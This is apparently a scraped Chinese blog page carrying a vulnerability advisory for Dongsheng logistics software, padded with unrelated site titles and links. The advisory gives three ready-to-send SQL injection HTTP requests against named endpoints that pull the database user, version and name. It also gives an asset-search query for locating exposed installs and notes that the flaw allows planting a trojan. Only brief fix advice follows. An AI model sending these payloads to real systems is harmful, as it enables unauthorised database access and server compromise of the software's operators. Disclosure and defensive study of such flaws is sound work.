当前位置: 首页 > news >正文

做学历的网站表白小程序制作

news 2025/9/17 22:32:04
做学历的网站,表白小程序制作,高端网站建设kgwl,落地页网站0x01 产品简介 东胜物流软件是一款致力于为客户提供IT支撑的 SOP, 帮助客户大幅提高工作效率,降低各个环节潜在风险的物流软件。 0x02 漏洞概述 东胜物流软件 TCodeVoynoAdapter.aspx、/TruckMng/MsWlDriver/GetDataList、/MvcShipping/MsBaseInfo/Sav…

0x01 产品简介

 东胜物流软件是一款致力于为客户提供IT支撑的 SOP, 帮助客户大幅提高工作效率,降低各个环节潜在风险的物流软件。

0x02 漏洞概述

东胜物流软件 TCodeVoynoAdapter.aspx、/TruckMng/MsWlDriver/GetDataList、/MvcShipping/MsBaseInfo/SaveUserQuerySetting等接口处存在 SQL 注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 复现环境

微步资产测绘:app=东胜物流软件

0x04 漏洞复现 

PoC-1

GET /FeeCodes/TCodeVoynoAdapter.aspx?mask=0&pos=0&strVESSEL=1%27+and+user+%3E0%3B-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

查询当前用户

PoC-2 

GET /TruckMng/MsWlDriver/GetDataList?_dc=1665626804091&start=0&limit=30&sort=&condition=123+IN+(CHAR(113)%2bCHAR(120)%2bCHAR(112)%2bCHAR(113)%2bCHAR(113)%2bCHAR(32)%2b(select+%40%40version)%2bCHAR(32)%2bCHAR(113)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113))--%20&page=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

查询数据库版本

PoC-3

POST /MvcShipping/MsBaseInfo/SaveUserQuerySetting HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15formname=MsRptSaleBalProfitShareIndex'+AND+2523+IN+(SELECT+(CHAR(113)%2bCHAR(120)%2bCHAR(112)%2bCHAR(113)%2bCHAR(113)%2b(SELECT+SUBSTRING((ISNULL(CAST((+db_name%28%29)+AS+NVARCHAR(4000)),CHAR(32))),1,1024))%2bCHAR(113)%2bCHAR(122)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)))+AND+'uKco'%3d'uKco&isvisible=true&issavevalue=true&querydetail=%7B%22PS_MBLNO%22%3A%22%22%2C%22PS_VESSEL%22%3A%22%22%2C%22PS_VOYNO%22%3A%22%22%2C%22PS_SALE%22%3A%22%5Cu91d1%5Cu78ca%22%2C%22PS_OP%22%3Anull%2C%22PS_EXPDATEBGN%22%3A%222020-02-01%22%2C%22PS_EXPDATEEND%22%3A%222020-02-29%22%2C%22PS_STLDATEBGN%22%3A%22%22%2C%22PS_STLDATEEND%22%3A%22%22%2C%22PS_ACCDATEBGN%22%3A%22%22%2C%22PS_ACCDATEEND%22%3A%22%22%2C%22checkboxfield-1188-inputEl%22%3A%22on%22%2C%22PS_CUSTSERVICE%22%3Anull%2C%22PS_DOC%22%3Anull%2C%22hiddenfield-1206-inputEl%22%3A%22%22%7D}

 查询当前数据库

0x05 修复建议

官方暂未修复该漏洞,请用户联系厂商修复漏洞:http://www.dongshengsoft.com/

部署Web应用防火墙,对数据库操作进行监控。

如非必要,禁止公网访问该系统。

 

http://www.yayakq.cn/news/308791/

相关文章:

  • python flask做网站东莞网络问政平台
  • 江门网站建设运营团队php网站如何绑定一级域名到子目录
  • wordpress4.5.2文章采集合肥seo网站多少钱
  • 鄂州做网站的公司网站开发有哪些竞赛
  • 查询单位信息的网站广东阳江房产网
  • 杭州网站建设网站制作怎么对自己做的网站进行加密
  • 宁夏银川网站建设平邑建设银行网站
  • 网站维护报价表wordpress页面可视化编辑器
  • 广州手机网站设计企业官网维护
  • 浙江金华网站建设企业邮箱登录入口官网网页版
  • 网站建设公司企业模板下载js做网站框架
  • 手机端网站需要多少钱网站开发和合同
  • 赌城网站怎么做海南新政策最新消息
  • 学校网站设计的作用商务网站建设的调研
  • 制作一个公司的简单网页网站内容页优化
  • phpcms中的网站介绍页企业网站seo公司
  • 企业管理系统登录郑州网站优化公司
  • 广州冼村地铁站几号线iapp源码网
  • 没备案的网站怎么做淘客wordpress微信红包
  • 做钻石资讯网站python做简单网站
  • 蓝色旅游资讯网站模板北京做网站浩森宇特
  • 网站的布局有哪些h5视频直播
  • 专题类的网站asp.net做电商网站页面
  • vs2008网站消息弹窗怎么做cms监控系统电脑版
  • 宜宾长宁网站建设成功的软文营销案例
  • 闲鱼上做网站卖汽车配件怎么做网站
  • 那家建网站宝盒好用深圳百度关键
  • 建设官方网站多少郑州网站建设哪家好怎么样
  • 网站建设登录注册怎么做wordpress+首页置顶
  • 专业网站建设品牌策划国内平台有哪些